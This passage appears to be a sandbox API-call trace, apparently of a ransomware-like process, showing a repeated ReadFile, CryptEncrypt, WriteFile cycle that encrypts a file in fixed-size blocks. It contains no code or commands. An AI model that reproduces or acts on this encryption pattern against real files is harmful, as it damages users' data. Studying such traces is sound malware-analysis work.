lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.846] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.846] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.846] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.846] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.846] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.846] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.847] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.847] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.847] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.847] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.847] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.848] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.848] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.848] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.848] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.848] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.848] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.849] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.849] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.849] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.849] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.849] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.850] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.850] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.850] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.850] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.850] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.850] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.850] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.850] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.850] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.851] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.851] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.851] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.851] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.851] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.851] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.851] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.852] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.852] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.852] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.852] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.852] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.853] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.853] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.853] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.853] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.853] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.853] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) 